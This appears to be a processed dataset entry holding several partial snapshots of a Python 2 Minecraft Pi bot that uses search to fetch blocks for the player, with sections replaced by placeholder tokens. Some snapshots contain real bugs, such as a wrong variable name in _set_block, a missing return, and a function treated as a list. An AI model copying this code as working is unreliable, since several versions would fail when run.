player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n        legal actions that don't involve placing the block.\"\"\"\n        return self._get_move_actions(block_) + self._get_mine_actions(\n            ) + self._get_placement_actions(block_)\n\n    def contains(self, block_):\n        \"\"\"Return whether or not the bot contains the block id.\"\"\"\n        return block_ in self._inventory\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        raise NotImplementedError\n\n    def _place(self, loc, exclude=None, block_=None):\n        \"\"\"Place a block from the inventory only.\n\n        If exclude is not None, place a block that is not 'exclude'.\n        If block_ is not None, place that block only.\n        \"\"\"\n        if not self._inventory:\n            raise Exception('Inventory empty')\n        if block_ is None:\n            for key in self._inventory:\n                if key != exclude:\n                    block_ = key\n                    break\n            else:\n                raise Exception(\n                    'You requested not to place %s, but it is the only block in the inventory.'\n                     % exclude)\n        if block_ not in self._inventory:\n            raise Exception('Block %s is not in the inventory' % block_)\n        if self._inventory[block_] == 1:\n            del self._inventory[block_]\n        else:\n            self._inventory[block_] -= 1\n        self._set_block(loc, block_)\n\n    def _move_down(self):\n        \"\"\"Move and mine the block below.\"\"\"\n        new_pos = self._pos + _Vec3(0, -1, 0)\n        block_ = self._get_block(new_pos)\n        if block_ != _WATER:\n            self._add_to_inv(block_)\n        self._move(new_pos)\n    <function token>\n    <function token>\n    <function token>\n\n    def _get_move_actions(self, exclude=None):\n        \"\"\"Return a list of legal movement actions.\n\n        exclude is the block to exclude.\n        \"\"\"\n        rtn = []\n        can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n            _WATER}\n        if can_move_up:\n            if self._surrounded():\n                rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n                    1, 0),)})\n            else:\n                rtn.append({'func': '_move_up', 'args': (exclude,)})\n        hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n        if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n            rtn.append({'func': '_move_down'})\n        for dir_ in _adj_dirs():\n            rtn.extend(self._side_moves(dir_, can_move_up))\n        return rtn\n\n    def _side_moves(self, dir_, can_move_up):\n        \"\"\"Return the list of side moves.\n\n        dir_ is an adjacent direction.\n        can_move_up is a boolean for whether or not the bot can move up.\n        \"\"\"\n        rtn = []\n        base_pos = self._pos + dir_\n        base_block = self._get_block(base_pos)\n        empty_blocks = {_AIR, _WATER}\n        if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n            for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n                if self._get_block(base_pos + vert_dir) not in empty_blocks:\n                    break\n            else:\n                rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n                    0),)})\n        for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n            if self._get_block(base_pos + vert_dir) not in empty_blocks:\n                break\n        else:\n            pos = base_pos + _Vec3(0, -1, 0)\n            for _ in xrange(_DROP_PLUS_1):\n                block_ = self._get_block(pos)\n                if block_ != _AIR:\n                    if block_ != _LAVA:\n                        rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n                            1, 0),)})\n                    break\n                pos.y -= 1\n        return rtn\n\n    def _surrounded(self):\n        \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n        for dir_ in _adj_dirs():\n            if self._get_block(self._pos + dir_) != _WATER:\n                return False\n        return True\n\n    def _get_mine_actions(self):\n        \"\"\"Return a list of legal mining actions (that only involve mining\n        and not moving).\"\"\"\n        rtn = []\n        dont_mine = {_AIR, _WATER, _LAVA}\n        pos_above = self._pos + _Vec3(0, 2, 0)\n        if self._get_block(pos_above) not in dont_mine:\n            rtn.append({'func': '_mine', 'args': 
(pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': 
(pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n 
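# The return plan has just been replayed on the imaginary bot, so\n        # imag_bot.get_pos() is where the real bot will stand once the plan\n        # runs; _ReturnProblem.isGoalState keeps that spot level with the\n        # player and exactly two blocks away along one axis. The '_place'\n        # action appended below therefore targets the midpoint cell between\n        # the two, e.g. a bot at x=12 returning to a player at x=10 places\n        # the fetched block at x=11.\n        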
return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n        self.take_actions(return_actions, _DELAY)\n\n    def _get_block_loc(self, block_id):\n        \"\"\"Return the location of the block.\"\"\"\n        find_prob = FindProblem(self._pos, block_id)\n        dirs = bfs(find_prob)\n        return self._pos + sum(dirs)\n\n    def _set_block(self, pos, block_):\n        \"\"\"Place an actual block in the world.\n\n        block_ is a block id.\"\"\"\n        _get_mc().setBlock(pos, block_)\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        return _get_mc().getBlock(pos)\n\n    def _move(self, pos):\n        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n        self._set_block(pos, self._BOT_BLOCK)\n        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n        self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n    \"\"\"Problem for finding the location of a block in the world.\n\n    A state in this problem is a location.\n    \"\"\"\n\n    def __init__(self, start_loc, block_id):\n        \"\"\"Initialize.\"\"\"\n        self._start_loc = deepcopy(start_loc)\n        self._block_id = block_id\n\n    def getStartState(self):\n        \"\"\"Return the starting location.\"\"\"\n        return self._start_loc\n\n    def isGoalState(self, state):\n        return _get_mc().getBlock(state) == self._block_id\n\n    def getSuccessors(self, state):\n        \"\"\"Return the successors.\"\"\"\n        rtn = []\n        for dir_ in _all_dirs():\n            successor = state + dir_\n            if successor.y <= _get_mc().getHeight(successor.x, successor.z\n                ) and _get_mc().getBlock(successor) != _BEDROCK:\n                rtn.append((successor, dir_, 1))\n        return rtn\n\n\nclass _MineProblem(SearchProblem):\n    \"\"\"The problem of finding the block and mining it (not returning\n    it).\"\"\"\n\n    def __init__(self, imag_bot, block_loc, block_id):\n        \"\"\"Initialize the problem with an _ImaginaryBot.\n\n        block_loc is a Vec3.\n        \"\"\"\n        self._bot = imag_bot\n        self._block_loc = deepcopy(block_loc)\n        self._block_id = block_id\n\n    def get_block_loc(self):\n        \"\"\"Return the block location.\"\"\"\n        return deepcopy(self._block_loc)\n\n    def get_block_id(self):\n        \"\"\"Return the block it's trying to mine.\"\"\"\n        return self._block_id\n\n    def getStartState(self):\n        \"\"\"Return the bot passed in.\"\"\"\n        return self._bot\n\n    def isGoalState(self, state):\n        \"\"\"Return whether or not the bot has the block.\"\"\"\n        return state.contains(self._block_id)\n\n    def getSuccessors(self, state):\n        \"\"\"Return the successors.\"\"\"\n        rtn = []\n        for action in state.get_legal_actions():\n            successor = deepcopy(state)\n            successor.take_action(action)\n            rtn.append((successor, action, 1))\n        return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n    \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': 
